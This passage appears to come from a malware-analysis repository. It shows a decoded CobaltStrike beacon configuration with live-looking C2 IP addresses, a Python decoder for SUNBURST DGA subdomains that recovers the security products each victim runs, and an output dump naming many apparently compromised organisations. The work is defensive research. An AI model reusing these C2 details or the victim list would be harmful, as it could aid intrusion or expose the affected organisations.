 82 | After decoding we can dump the CobaltStrike beacon config:
 83 | 
 84 | 
 85 | Beacon config:
 86 | 
 87 | ```
 88 | {'PROXY_BEHAVIOR': '1', 'PROTOCOL': '8', 'SPAWNTO_X64': '%windir%\\sysnative\\rundll32.exe', 'SLEEPTIME': '10000', 'KillDate': '0', 'C2_VERB_GET': 'GET', 'ProcInject_Prepend_x64': '', 'ProcInject_StartRWX': '64', 'DNS_SLEEP': '0', 'ProcInject_Stub': '\xa5l\x818d\xaf\x87\x8aL\x10\x08<\xa1W\x8e\n', 'HostHeader': '', 'ProcInject_Prepend_x86': '', 'ProcInject_MinAllocSize': '0', 'ProcInject_UseRWX': '64', 'MAXGET': '1403644', 'USERAGENT': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36', 'PORT': '443', 'DNS_IDLE': '0', 'ProcInject_AllocationMethod': '0', 'UNKNOWN55': '30', 'UsesCookies': '1', 'C2_POSTREQ': "[('_HEADER', 0, 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'), ('_HEADER', 0, 'Accept-Encoding: gzip, deflate'), ('BUILD', ('MASK',))]", 'WATERMARK': '305419896', 'textSectEnd': '0', 'PUBKEY': '30819f300d06092a864886f70d010101050003818d003081890281810095e0157049a3b398f64386cb92c60e6735ea9b6b2ad403259975212790cca0eb351285a9dfb4b8ecf2ed72226d408b64178050a8da5bef9563b2f53a905ab90f5e96ba008bdf4e171d3f2b4ca6b194da29218aa306962c4622a5ec421e569021c49bcee6b97706a6c5692489a0bd3d6ead5b22417711ba5ffdf74afe70b90c230203010001', 'SPAWNTO_X86': '%windir%\\syswow64\\rundll32.exe', 'C2_REQUEST': "[('_HEADER', 0, 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'), ('_HEADER', 0, 'Accept-Encoding: gzip, deflate'), ('BUILD', ('BASE64URL',)), ('HEADER', 0, 'Cookie')]", 'CRYPTO_sCHEME': '0', 'ITTER': '30', 'C2_RECOVER': '\x04\x00\x00\x00\x01\x00\x00\x05\xf2\x00\x00\x00\x02\x00\x00\x00T\x00\x00\x00\x02\x00\x00\x0f[\x00\x00\x00\r\x00\x00\x00\x0f', 'C2_CHUNK_POST': '0', 'ProcInject_Execute': '\x01\x02\x03\x04', 'PIPENAME': '', 'C2_VERB_POST': 'POST', 'bStageCleanup': '0', 'SPAWNTO': '', 'SUBMITURI': '/jquery-3.3.2.min.js', 'DOMAINS': '106.53.232.176,/jquery-3.3.1.min.js,121.196.25.148,/jquery-3.3.1.min.js,47.96.82.40,/jquery-3.3.1.min.js,49.234.9.94,/jquery-3.3.1.min.js,106.52.51.225,/jquery-3.3.1.min.js', 'bCFGCaution': '0', 'MAXDNS': '255'}
 89 | 
 90 | ```
 91 | 
 92 | 
 93 | 
 94 | Watermark is related to the leaked version of CobaltStrike which would make me believe this not a red team, if it is they need to fix their use of stolen software.
 95 | 
 96 | 
 97 | 
 98 | 
 99 | 
100 | 


--------------------------------------------------------------------------------
/sunburst_dga/decode.py:
--------------------------------------------------------------------------------
  1 | import base64
  2 | import string
  3 | import random
  4 | import binascii
  5 | import struct
  6 | import sys
  7 | import pprint
  8 | 
  9 | WIN_DEFEND_RUNNING = 1
 10 | WIN_DEFEND_STOPPED = 2
 11 | WIN_DEFEND_ATP_RUNNING = 4
 12 | WIN_DEFEND_ATP_STOPPED = 8
 13 | MS_DEFENDER_ID_RUNNING = 16
 14 | MS_DEFENDER_ID_STOPPED = 32
 15 | CARBON_BLACK_RUNNING=64
 16 | CARBON_BLACK_STOPPED=128
 17 | CROWDSTRIKE_RUNNING=256
 18 | CROWDSTRIKE_STOPPED=512
 19 | FIREEYE_RUNNING=1024
 20 | FIREEYE_STOPPED=2048
 21 | ESET_RUNNING=4096
 22 | ESET_STOPPED=8192
 23 | FSECURE_RUNNING=16384
 24 | FSECURE_STOPPED=32768
 25 | 
 26 | def get_flags(a):
 27 |     ret = []
 28 |     if a & WIN_DEFEND_RUNNING:
 29 |         ret.append("Windows Defender Running")
 30 |     if a & WIN_DEFEND_STOPPED:
 31 |         ret.append("WINDOWS DEFENDER STOPPED")
 32 |     if a & WIN_DEFEND_ATP_RUNNING:
 33 |         ret.append("WINDOWS DEFENDER ATP RUNNING")
 34 |     if a & WIN_DEFEND_ATP_STOPPED:
 35 |         ret.append("WINDOWS DEFENDER ATP STOPPED")
 36 |     if a & MS_DEFENDER_ID_RUNNING:
 37 |         ret.append("MS DEFENDER ID RUNNING")
 38 |     if a & MS_DEFENDER_ID_STOPPED:
 39 |         ret.append("MS DEFENDER ID STOPPED")
 40 |     if a & CARBON_BLACK_RUNNING:
 41 |         ret.append("CARBONBLACK RUNNING")
 42 |     if a & CARBON_BLACK_STOPPED:
 43 |         ret.append("CarbonBlack STOPPED")
 44 |     if a & CROWDSTRIKE_RUNNING:
 45 |         ret.append("CROWDSTRIKE RUNNING")
 46 |     if a & CROWDSTRIKE_STOPPED:
 47 |         ret.append("CROWDSTRIKE STOPPED")
 48 |     if a & FIREEYE_RUNNING:
 49 |         ret.append("FIREEYE RUNNING")
 50 |     if a & FIREEYE_STOPPED:
 51 |         ret.append("FIREYE STOPPED")
 52 |     if a & ESET_RUNNING:
 53 |         ret.append("ESET RUNNING")
 54 |     if a & ESET_STOPPED:
 55 |         ret.append("ESET STOPPED")
 56 |     if a & FSECURE_RUNNING:
 57 |         ret.append("FSECURE RUNNING")
 58 |     if a & FSECURE_STOPPED:
 59 |         ret.append("FSECURE STOPPED")
 60 |     return ret
 61 | 
 62 | 
 63 | def custom_b32decode(s):
 64 |     std_base32chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZ234567"
 65 |     my_base32chars = "ph2eifo3n5utg1j8d94qrvbmk0sal76c"
 66 |     temp = s.translate(string.maketrans(my_base32chars, std_base32chars))
 67 |     return base64.b32decode(temp)
 68 | 
 69 | 
 70 | #From @RedDrip7  - Fix datalen calculation by @sysopfb
 71 | def Base32Decode(string):
 72 | 	text = "ph2eifo3n5utg1j8d94qrvbmk0sal76c"
 73 | 	restring = ""
 74 | 	datalen = len(string) * 5 / 8
 75 | 	num = 0
 76 | 	ib = 0;
 77 | 	if len(string) < 3:
 78 | 		restring = chr(text.find(string[0]) | text.find(string[1]) << 5 & 255)
 79 | 		return restring
 80 | 	
 81 | 	k = text.find(string[0]) | (text.find(string[1]) << 5)
 82 | 	j = 10
 83 | 	index = 2
 84 | 	for i in range(datalen):
 85 | 		restring += chr(k & 255)
 86 | 		k = k >> 8
 87 | 		j -= 8
 88 | 		while( j < 8 and index < len(string)):
 89 | 			k |= (text.find(string[index]) << j)
 90 | 			index += 1
 91 | 			j += 5
 92 | 
 93 | 	return restring
 94 | 
 95 | 
 96 | #From @RedDrip7  
 97 | def Decode(string):
 98 | 	text = "rq3gsalt6u1iyfzop572d49bnx8cvmkewhj"
 99 | 	text2 = "0_-."
100 | 	retstring = ""
101 | 	flag = False
102 | 	for i in range(len(string)):
103 | 		ch = string[i]
104 | 		tx_index = -1
105 | 		tx2_index = -1
106 | 		if flag:
107 | 			t1i = text.find(ch)
108 | 			x = t1i - ((random.randint(0,8) % (len(text) / len(text2))) * len(text2))
109 | 			retstring = retstring+text2[x % len(text2)]
110 | 			flag = False
111 | 			continue
112 | 		if ch in text2:
113 | 			tx2_index = text2.find(ch)
114 | 			flag = True
115 | 			pass
116 | 		else:
117 | 			tx_index = text.find(ch)
118 | 			oindex = tx_index - 4
119 | 			retstring = retstring+text[oindex % len(text)]
120 | 
121 | 		pass
122 | 	return retstring
123 | 
124 | 
125 | 
126 | def get_subdomain(s):
127 |     ret = None
128 |     if '.appsync-api.' in s:
129 |         ret = s.split('.appsync-api.')[0]
130 |     return ret
131 | 
132 | full_data = {}
133 | 
134 | def decode(s):
135 |     d = get_subdomain(s)
136 |     if d == None or len(d) < 15:
137 |         return None
138 |     else:
139 |         user_id = bytearray(Base32Decode(d[:15]))
140 |         key = user_id[0]
141 |         user_id = user_id[1:]
142 |         for i in range(len(user_id)):
143 |             user_id[i] ^= key
144 |         part = ord(d[0]) % 36 - "0123456789abcdefghijklmnopqrstuvwxyz".index(d[15])
145 |         if d[16:18] == '00':
146 |             decoded = Base32Decode(d[18:])
147 |         else:
148 |             decoded = Decode(d[16:])
149 |         if part in [0,1,2]:
150 |             print("User ID:" + binascii.hexlify(user_id))
151 |             print("Domain Part Number: "+ str(part))
152 |             print("Domain: " + decoded)
153 |             if binascii.hexlify(user_id) not in full_data.keys():
154 |                 full_data[binascii.hexlify(user_id)] = {part: decoded}
155 |             else:
156 |                 full_data[binascii.hexlify(user_id)][part]=decoded
157 |         else:
158 |             #Data
159 |             decoded = bytearray(Base32Decode(d))
160 |             for i in range(1,len(decoded)):
161 |                 decoded[i] ^= decoded[0]
162 |             user_id = decoded[1:9]
163 |             key = decoded[10:12]
164 |             for i in range(len(user_id)):
165 |                 user_id[i] ^= key[(i+1)%len(key)]
166 | 
167 |             blob = decoded[9:]
168 |             print("DEBUG: "+binascii.hexlify(blob))
169 |             if len(blob) < 3:
170 |                 return
171 |             data_len = (blob[0] & 0xf0) >> 4
172 |             timestamp = struct.unpack_from('>I', '\x00'+blob[:3])[0] & 0xfffff
173 |             data = blob[3:]
174 |             print("User ID:" + binascii.hexlify(user_id))
175 |             if binascii.hexlify(user_id) not in full_data.keys():
176 |                 full_data[binascii.hexlify(user_id)] = {}
177 |             print("TimeStamp:" + hex(timestamp))
178 |             if data_len < 2:
179 |                 print("PING")
180 |             else:
181 |                 print("Data Length:" + str(data_len))
182 |                 print("Data:" + binascii.hexlify(data))
183 |                 flags = get_flags(struct.unpack_from('>H',data)[0])
184 |                 print(flags)
185 |                 full_data[binascii.hexlify(user_id)]['AV'] = flags
186 |     return decoded
187 | 
188 | 
189 | test = 'lt5ai41qh5d53qoti3mkmc0.appsync-api.us-west-2.avsvmcloud.com'
190 | 
191 | test2 = get_subdomain(test)
192 | 
193 | temp = Base32Decode(test2)
194 | print(binascii.hexlify(temp))
195 | decode(test)
196 | 
197 | data = open(sys.argv[1], 'rb').read()
198 | for line in data.split('\n'):
199 |     try:
200 |         decode(line)
201 |     except:
202 |         continue
203 | 
204 | pprint.pprint(full_data)
205 | 


--------------------------------------------------------------------------------
/sunburst_dga/dump.txt:
--------------------------------------------------------------------------------
  1 | {'0000000000000000': {2: '8cjlfb2j',
  2 |                       'AV': ['Windows Defender Running',
  3 |                              'WINDOWS DEFENDER ATP RUNNING',
  4 |                              'MS DEFENDER ID RUNNING',
  5 |                              'MS DEFENDER ID STOPPED',
  6 |                              'CarbonBlack STOPPED',
  7 |                              'CROWDSTRIKE RUNNING',
  8 |                              'FIREEYE RUNNING',
  9 |                              'ESET RUNNING',
 10 |                              'ESET STOPPED',
 11 |                              'FSECURE STOPPED']},
 12 |  '000d09aef4860005': {1: 'cplds.local'},
 13 |  '006a12db5afbad3c': {1: 'rs.local'},
 14 |  '007c3870b8779db6': {1: 'com'},
 15 |  '008d8d69c07cbe21': {1: 'bi.corp'},
 16 |  '00b3b48413c50211': {1: 'jx_etn'},
 17 |  '01f2d72847342b99': {0: 'vms.ad.varian'},
 18 |  '03279c9327a63134': {'AV': ['Windows Defender Running',
 19 |                              'ESET RUNNING',
 20 |                              'ESET STOPPED']},
 21 |  '040fa3f3cee19510': {1: 'keyano.local', 'AV': []},
 22 |  '044d570d679e82d2': {1: 'cow.local'},
 23 |  '0480c25b459a0df2': {1: 'nnge.org'},
 24 |  '04f1eb221bf73453': {0: 'aur.national.c'},
 25 |  '065da7d8d3c23bca': {1: 'bps101.local', 'AV': []},
 26 |  '073fa65bf3516e41': {0: 'SmartPra',
 27 |                       1: 'm',
 28 |                       'AV': ['Windows Defender Running',
 29 |                              'WINDOWS DEFENDER STOPPED',
 30 |                              'ESET RUNNING',
 31 |                              'ESET STOPPED']},
 32 |  '07aab3f3e03fe96e': {2: 'fb97'},
 33 |  '07b3ba9f28b24c15': {1: 'gksm.local', 'AV': ['Windows Defender Running']},
 34 |  '07c93d55749f584b': {0: 'County.S',
 35 |                       1: '7lmwqsixja9cqy',
 36 |                       'AV': ['Windows Defender Running']},
 37 |  '0844c2edb7bd7c72': {'AV': []},
 38 |  '08cff2847dccf4a9': {'AV': []},
 39 |  '0909be233577635f': {1: 'scif.com'},
 40 |  '09505b6e5916e6b4': {0: 'i.midamerican.'},
 41 |  '09b7536e47199f02': {1: 'ieb.go.id'},
 42 |  '0a910b610cc5e8e2': {},
 43 |  '0ba6c649cb17413e': {2: 'i2.'},
 44 |  '0bbe7684f442ed93': {1: 'sjhsagov.org'},
 45 |  '0ccdd5991da3d318': {1: 'sdch.local', 'AV': ['Windows Defender Running']},
 46 |  '0ceb0205cb31b690': {1: 'zgs.loc', 'AV': []},
 47 |  '0d2b593433a76e63': {1: 'corp.sana.com', 'AV': []},
 48 |  '0d4dbffb86d41927': {1: 'kcpl.com'},
 49 |  '0e5c964fa25d161c': {1: 'xnet.kz'},
 50 |  '0ec401212fed06ec': {0: 'WASHOE.W'},
 51 |  '0f2049e8a4ccd368': {1: 'ah.org'},
 52 |  '0f4efd8be669c23f': {0: 'internal.hws.o',
 53 |                       'AV': ['ESET RUNNING', 'ESET STOPPED']},
 54 |  '0fe3cecfd8c861c0': {0: 'CIRCUIT1', 1: '8u9w3ki'},
 55 |  '1031a674d8f13ee3': {1: 'oslerhc.org', 'AV': ['Windows Defender Running']},
 56 |  '12dfae08296d5726': {0: '1386-1-1',
 57 |                       1: 'ekwc',
 58 |                       'AV': ['Windows Defender Running']},
 59 |  '13510446f98f8497': {0: 'ad.optimizely.'},
 60 |  '1387af32db7f058a': {0: 'wjqpoet'},
 61 |  '139db966c6e5ae2a': {},
 62 |  '14420d89c9f29515': {1: 'sm-group.local'},
 63 |  '152129f444890134': {0: 'Maritime'},
 64 |  '1585c0c8f5010000': {'AV': ['WINDOWS DEFENDER ATP RUNNING',
 65 |                              'CARBONBLACK RUNNING',
 66 |                              'FIREEYE RUNNING',
 67 |                              'FSECURE RUNNING']},
 68 |  '163c59ef75e89e78': {1: 'gncu.local'},
 69 |  '16d12f4b3be1fc3a': {'AV': ['Windows Defender Running',
 70 |                              'WINDOWS DEFENDER STOPPED',
 71 |                              'MS DEFENDER ID RUNNING',
 72 |                              'CARBONBLACK RUNNING',
 73 |                              'CROWDSTRIKE RUNNING',
 74 |                              'CROWDSTRIKE STOPPED',
 75 |                              'FIREYE STOPPED',
 76 |                              'ESET RUNNING',
 77 |                              'FSECURE RUNNING',
 78 |                              'FSECURE STOPPED']},
 79 |  '16ff565ea5906e95': {0: 'Amerisaf'},
 80 |  '171dcb14ebba8dd9': {'AV': ['Windows Defender Running',
 81 |                              'CARBONBLACK RUNNING']},
 82 |  '18039e2c39e8469d': {1: 'kk.dk', 'AV': []},
 83 |  '1803a4978c380483': {1: 'fcmat.org'},
 84 |  '18ce51987a1fdbb1': {'AV': ['Windows Defender Running']},
 85 |  '193f117842df9519': {0: 'fremont.lamrc.', 1: 'net', 'AV': []},
 86 |  '19bb98bff5653303': {'AV': ['CROWDSTRIKE RUNNING', 'CROWDSTRIKE STOPPED']},
 87 |  '19d73f453a68ab76': {0: 'WASHOE.W'},
 88 |  '1a0039b533994e2e': {},
 89 |  '1a103c1238c2a4ee': {0: 'ci.dublin.ca.',
 90 |                       1: 'us',
 91 |                       'AV': ['Windows Defender Running']},
 92 |  '1a4bdb7c68919bf9': {'AV': ['Windows Defender Running']},
 93 |  '1b33246ac9917060': {1: 'tx.org', 'AV': []},
 94 |  '1b3c1100b89e9d98': {},
 95 |  '1b6dbf60da460a32': {},
 96 |  '1bd9469be7bb1a73': {0: 'LOCAL.LA'},
 97 |  '1bdaa6ed58e0e09d': {1: 'nvidia.com',
 98 |                       'AV': ['Windows Defender Running',
 99 |                              'WINDOWS DEFENDER STOPPED',
100 |                              'FIREEYE RUNNING',
101 |                              'FIREYE STOPPED']},
102 |  '1c9e1e288772639a': {1: 'rocket.science'},
103 |  '1cada75a69f57ec1': {0: 'ops.lab3.servi'},
104 |  '1d5e84850e5a7030': {0: 'corpcomp.drs.m'},
105 |  '1d71011e992c3d68': {0: 'central.pima.g', 1: 'ov', 'AV': []},
106 |  '1db51663e7f86d53': {1: 'mixonhill.com'},
107 |  '1db6b7e7cab149f5': {1: 'intensive.int', 'AV': []},
108 |  '1e525327a50e4cc4': {},
109 |  '1e75c9def59c0584': {1: '9hr2ttm'},
110 |  '1e96642c9b4295d0': {'AV': ['Windows Defender Running']},
111 |  '1e9dfbcc8e225fe5': {},
112 |  '1f663e4244a43eba': {1: 'fhc.local'},
113 |  '1fc60529b79004df': {2: 'inujmgl'},
114 |  '2039afe13e5307a1': {},
115 |  '209f99417ed8edba': {'AV': []},
116 |  '2126c338cd4c9dba': {0: '52dl'},
117 |  '2146c6a026a29fed': {'AV': ['Windows Defender Running',
118 |                              'WINDOWS DEFENDER STOPPED',
119 |                              'MS DEFENDER ID STOPPED',
120 |                              'CARBONBLACK RUNNING',
121 |                              'CROWDSTRIKE RUNNING',
122 |                              'CROWDSTRIKE STOPPED',
123 |                              'ESET STOPPED',
124 |                              'FSECURE RUNNING']},
125 |  '2158b2471f45a990': {1: 'coxnet.cox.com',
126 |                       'AV': ['Windows Defender Running',
127 |                              'CARBONBLACK RUNNING']},
128 |  '217e7f86d7199ef9': {1: 'cfsi.local', 'AV': []},
129 |  '218f4b8197629894': {1: 'n2l7et3'},
130 |  '21e1535b658a919e': {1: 'COWI.Net',
131 |                       'AV': ['Windows Defender Running',
132 |                              'WINDOWS DEFENDER STOPPED',
133 |                              'WINDOWS DEFENDER ATP RUNNING',
134 |                              'WINDOWS DEFENDER ATP STOPPED']},
135 |  '22334a7227544b1e': {},
136 |  '23305e1636b4472e': {},
137 |  '2445382aa018045c': {},
138 |  '247d2a7e9bbadf75': {1: 'm'},
139 |  '25168e74c1b01501': {0: 'AHCCCS.S', 1: 'udea735yfgkfniu'},
140 |  '2634878359de73ab': {1: 'barrie.ca', 'AV': ['Windows Defender Running']},
141 |  '2648f48a1bb3c3e7': {0: 'neophotonics.co',
142 |                       'AV': ['Windows Defender Running']},
143 |  '264d9d0ef375325d': {},
144 |  '26b27ecc858c95a2': {1: 'corp.ptci.com'},
145 |  '274d1cf7eb633602': {1: 'cda.corp',
146 |                       'AV': ['Windows Defender Running',
147 |                              'CARBONBLACK RUNNING']},
148 |  '27675d9c5940fed8': {1: 'yorkton.cofy'},
149 |  '276e742e44bda1f1': {'AV': ['Windows Defender Running',
150 |                              'WINDOWS DEFENDER STOPPED',
151 |                              'MS DEFENDER ID STOPPED',
152 |                              'CROWDSTRIKE RUNNING',
153 |                              'CROWDSTRIKE STOPPED',
154 |                              'ESET STOPPED']},
155 |  '279c51440f04558e': {'AV': ['Windows Defender Running',
156 |                              'ESET RUNNING',
157 |                              'ESET STOPPED']},
158 |  '27bcb00be43123da': {0: 'its.iastate.ed'},
159 |  '27cd70f4f967c4b4': {1: 'gksm.local', 'AV': ['Windows Defender Running']},
160 |  '27e1e9255537b2ac': {1: 'ch.local', 'AV': []},
161 |  '27ed40001ee2f3c5': {0: 'fisherbartoninc',
162 |                       1: '.com',
163 |                       'AV': ['Windows Defender Running']},
164 |  '2820823bc83cff9a': {1: 'hnu7'},
165 |  '28893f21fc2432f4': {1: 'haifa.edu', 'AV': []},
166 |  '2926cb38c54c95ba': {0: 'u9hx'},
167 |  '29964e4a8f627ca1': {1: 'aerioncorp.com', 'AV': []},
168 |  '29a8f7ba98ff8656': {1: 'ndeo'},
169 |  '2aa7bde7d68c4235': {1: 'gncu.local'},
170 |  '2b3dd0ac2525b117': {1: 'corp.dvd.com'},
171 |  '2b499fdfb1ebc87a': {1: 'thoughtspot.int',
172 |                       'AV': ['Windows Defender Running']},
173 |  '2b533f61548d5f91': {1: 'DCCAT.DK', 'AV': []},
174 |  '2be4fd4c82059215': {0: 'sos-ad.state.', 1: 'nv.us', 'AV': []},
175 |  '2bf8de15406ea780': {1: 'ftfcu.corp', 'AV': []},
176 |  '2c45cb2e26f31d16': {1: 'et'},
177 |  '2c62d905777e8df2': {},
178 |  '2d4a7623180ac319': {0: 'CRIHB.NE',
179 |                       1: 'm',
180 |                       'AV': ['Windows Defender Running',
181 |                              'CROWDSTRIKE RUNNING',
182 |                              'CROWDSTRIKE STOPPED']},
183 |  '2d82b037c060515c': {0: 'SFBALLET',
184 |                       'AV': ['Windows Defender Running',
185 |                              'WINDOWS DEFENDER STOPPED']},
186 |  '2df7e42ac3b461ab': {0: 'c4e-internal.c'},
187 |  '2e376a0cd6d1f3eb': {1: 'ftfcu.corp', 'AV': []},
188 |  '2e468c08f29459ed': {1: 'ecobank.group'},
189 |  '2eac3eb75d4b3c8c': {1: 'rp', 'AV': ['Windows Defender Running']},
190 |  '2f3ce6af7ddbb7c4': {'AV': []},
191 |  '30662b5333d056f2': {1: 'i2m3'},
192 |  '30737e1079938f66': {'AV': []},
193 |  '30bef7dacb7cc5c0': {1: 'bop.com.pk'},
194 |  '31393aca1e1ecf00': {'AV': ['Windows Defender Running',
195 |                              'WINDOWS DEFENDER STOPPED']},
196 |  '31f458d168175462': {1: 'cda.corp',
197 |                       'AV': ['Windows Defender Running',
198 |                              'CARBONBLACK RUNNING']},
199 |  '323319f10e3094db': {1: 'DCCAT.DK', 'AV': []},
200 |  '3247c6644be3f231': {0: 'detmir-group.r', 1: 'u', 'AV': []},
201 |  '326acc6608533d85': {0: 'seattle.interna'},
202 |  '32d28f9686b4a084': {0: 'OneScope'},
203 |  '331bd105df718f87': {1: 'gtnh'},
204 |  '333d0cd40b89a3b7': {1: 'ah.org'},
205 |  '33d7451bbd803f92': {1: '5tut'},
206 |  '33ebd250654ff495': {1: 'casino.prv'},
207 |  '3556010e9904304f': {1: 'smsnet.pl'},
208 |  '356e7a0fe17c30e7': {'AV': ['Windows Defender Running',
209 |                              'WINDOWS DEFENDER STOPPED',
210 |                              'CARBONBLACK RUNNING',
211 |                              'CarbonBlack STOPPED']},
212 |  '359573ff83552bda': {0: 'its.iastate.ed'},
213 |  '35c8a242b957913a': {1: 'ecocorp.local', 'AV': ['Windows Defender Running']},
214 |  '3627b3c196faaf9b': {1: 'helixwater.org', 'AV': []},
215 |  '3688780fc2f85a19': {1: 'gsf.cc', 'AV': ['Windows Defender Running']},
216 |  '369080b3e59a4ee1': {1: 'rccf.ru', 'AV': []},
217 |  '3703783fd98b92ff': {1: 'roymerlin.com'},
218 |  '37506c26ca905445': {0: 'americas.phoeni'},
219 |  '37d10fb2056036c1': {1: 'csci-va.com', 'AV': []},
220 |  '38233425c449405f': {0: 'LKDataCe',
221 |                       1: '7kuw3357zllc',
222 |                       'AV': ['Windows Defender Running']},
223 |  '3843752c16a5dc4d': {2: 'snklog3'},
224 |  '3913132cc680ad51': {0: 'wcnet.whitecase'},
225 |  '39759811cd1b500b': {},
226 |  '397d745e4c408290': {0: 'RALEYSNT', 1: 'nj_3357zllc', 'AV': []},
227 |  '3a889d9ccca2b81a': {},
228 |  '3a9a4f96f36ea3d6': {'AV': ['Windows Defender Running',
229 |                              'WINDOWS DEFENDER STOPPED',
230 |                              'MS DEFENDER ID STOPPED',
231 |                              'CARBONBLACK RUNNING',
232 |                              'CROWDSTRIKE RUNNING',
233 |                              'CROWDSTRIKE STOPPED',
234 |                              'ESET STOPPED',
235 |                              'FSECURE RUNNING']},
236 |  '3b992aa14cbf7f38': {1: 'taylorfarms.com'},
237 |  '3c327147876e6ea4': {'AV': ['Windows Defender Running']},
238 |  '3cb9db3ba77059cc': {},
239 |  '3d26c1a3b791e476': {1: 'ftfcu.corp', 'AV': []},
240 |  '3d8a9a52ac168e0b': {1: 'lufkintexas.net', 'AV': ['CROWDSTRIKE RUNNING']},
241 |  '3dc77f8a9bc685e2': {'AV': []},
242 |  '3e7d72ef4b0bcedc': {'AV': ['WINDOWS DEFENDER STOPPED',
243 |                              'WINDOWS DEFENDER ATP STOPPED',
244 |                              'CarbonBlack STOPPED',
245 |                              'CROWDSTRIKE RUNNING',
246 |                              'ESET RUNNING']},
247 |  '3e91904f8d51765c': {'AV': ['CROWDSTRIKE RUNNING']},
248 |  '3ed2e979d53b2523': {1: 'belkin.com'},
249 |  '3ef1c13eadf742e8': {'AV': []},
250 |  '3fbbdac9209b847c': {0: 'ville.terrebonn'},
251 |  '3fc3ec357c5ffe4a': {0: 'admin.callidusc'},
252 |  '4032be770efc7d80': {1: 'parentpay.local',
253 |                       'AV': ['Windows Defender Running']},
254 |  '4074ba9155a72551': {1: 'te.nz'},
255 |  '40a97f7746d6ba4d': {1: 'edg.net', 'AV': []},
256 |  '4225a5c345c1fc8e': {1: 'gncu.local'},
257 |  '426030b2ed480ded': {1: 'kcpl.com',
258 |                       'AV': ['Windows Defender Running',
259 |                              'WINDOWS DEFENDER STOPPED',
260 |                              'CARBONBLACK RUNNING',
261 |                              'CarbonBlack STOPPED']},
262 |  '4299736b260ca4d1': {0: 'ad.library.ucl',
263 |                       1: 'a.edu',
264 |                       'AV': ['Windows Defender Running']},
265 |  '42bf17c8173f16e7': {'AV': ['Windows Defender Running',
266 |                              'ESET RUNNING',
267 |                              'ESET STOPPED']},
268 |  '43c240684994f33b': {'AV': ['Windows Defender Running',
269 |                              'WINDOWS DEFENDER STOPPED',
270 |                              'CARBONBLACK RUNNING',
271 |                              'CROWDSTRIKE RUNNING',
272 |                              'CROWDSTRIKE STOPPED',
273 |                              'FSECURE RUNNING']},
274 |  '43f84f0854cb8d03': {0: 'intra.rakuten.'},
275 |  '44043eff3a239dbb': {'AV': ['Windows Defender Running',
276 |                              'WINDOWS DEFENDER STOPPED',
277 |                              'MS DEFENDER ID STOPPED',
278 |                              'CARBONBLACK RUNNING',
279 |                              'CROWDSTRIKE RUNNING',
280 |                              'CROWDSTRIKE STOPPED',
281 |                              'ESET STOPPED',
282 |                              'FSECURE RUNNING']},
283 |  '445dd371a0504b86': {'AV': ['Windows Defender Running',
284 |                              'WINDOWS DEFENDER STOPPED',
285 |                              'WINDOWS DEFENDER ATP RUNNING',
286 |                              'WINDOWS DEFENDER ATP STOPPED',
287 |                              'CarbonBlack STOPPED',
288 |                              'FIREEYE RUNNING',
289 |                              'FIREYE STOPPED',
290 |                              'FSECURE STOPPED']},
291 |  '44dcd3f0a0d14b07': {1: 'rm'},
292 |  '451b599221a39851': {'AV': ['Windows Defender Running',
293 |                              'ESET RUNNING',
294 |                              'ESET STOPPED']},
295 |  '46d63dedcf772d8c': {1: 'sro.vestfor.dk', 'AV': []},
296 |  '4794ee1b9a9c18de': {0: 'wfhf1.hewlett.'},
297 |  '485a420ccc25d61e': {},
298 |  '48a9c51f0a63eea3': {},
299 |  '48d2f32d8aa4ca01': {1: '82bphtu'},
300 |  '490f6db0ce010000': {},
301 |  '4981ffe651fa5f29': {},
302 |  '49e887fc6957d92d': {1: 'corp.ptci.com', 'AV': []},
303 |  '4a2986e3161612c4': {1: 'gnb.local', 'AV': ['Windows Defender Running']},
304 |  '4a82fce552f95c2a': {1: 'rbe.sk.ca'},
305 |  '4aadecef6217b244': {},
306 |  '4af52d29ec011fc2': {'AV': ['Windows Defender Running',
307 |                              'WINDOWS DEFENDER STOPPED',
308 |                              'MS DEFENDER ID STOPPED',
309 |                              'CARBONBLACK RUNNING',
310 |                              'CROWDSTRIKE RUNNING',
311 |                              'CROWDSTRIKE STOPPED',
312 |                              'ESET STOPPED',
313 |                              'FSECURE RUNNING']},
314 |  '4af99133cb8e23f2': {1: 'bok.com', 'AV': ['CROWDSTRIKE RUNNING']},
315 |  '4b0e9d09dd3275fa': {'AV': ['CARBONBLACK RUNNING', 'CarbonBlack STOPPED']},
316 |  '4b506a260a1085f0': {},
317 |  '4b59410fcf26d51d': {},
318 |  '4ba855eaab707cf8': {'AV': ['Windows Defender Running',
319 |                              'WINDOWS DEFENDER STOPPED',
320 |                              'MS DEFENDER ID STOPPED',
321 |                              'CARBONBLACK RUNNING',
322 |                              'CROWDSTRIKE RUNNING',
323 |                              'CROWDSTRIKE STOPPED',
324 |                              'ESET STOPPED',
325 |                              'FSECURE RUNNING']},
326 |  '4ce5352f9fffccd6': {},
327 |  '4d3f9fd08bbfada5': {'AV': ['Windows Defender Running']},
328 |  '4d6d747c939976fd': {1: 'nbim.no'},
329 |  '4e3c8e21ca84a324': {0: 'workdayinternal'},
330 |  '4e7a5bcd520cf1d0': {1: 'corp.ptci.com', 'AV': []},
331 |  '4ec699db4e8d8f9a': {0: 'wrbaustralia.ad'},
332 |  '4ec87e37baeb2053': {1: 'amalfi.local'},
333 |  '4f84b8f2dfa2c1a7': {'AV': ['Windows Defender Running',
334 |                              'ESET RUNNING',
335 |                              'ESET STOPPED']},
336 |  '4fb2de1ee6f758b7': {0: 'SCMRI.lo', 1: 'ujjc', 'AV': []},
337 |  '50040baf2af992c1': {'AV': ['Windows Defender Running',
338 |                              'WINDOWS DEFENDER STOPPED',
339 |                              'FIREEYE RUNNING',
340 |                              'FIREYE STOPPED']},
341 |  '50fa39c115235091': {},
342 |  '513c5e6acf56880c': {'AV': ['Windows Defender Running',
343 |                              'CARBONBLACK RUNNING']},
344 |  '518092c8fd571806': {1: 'alm.brand.dk', 'AV': []},
345 |  '520a1f7fe956009c': {},
346 |  '5326b138bf4cefba': {0: 'gk5'},
347 |  '534cee88bd75c834': {0: 'sfsi.stearnsban'},
348 |  '53b1d7ec405cae41': {'AV': ['ESET RUNNING', 'ESET STOPPED']},
349 |  '53fa1cc87ee4f833': {1: 'coxnet.cox.com',
350 |                       'AV': ['Windows Defender Running',
351 |                              'CARBONBLACK RUNNING']},
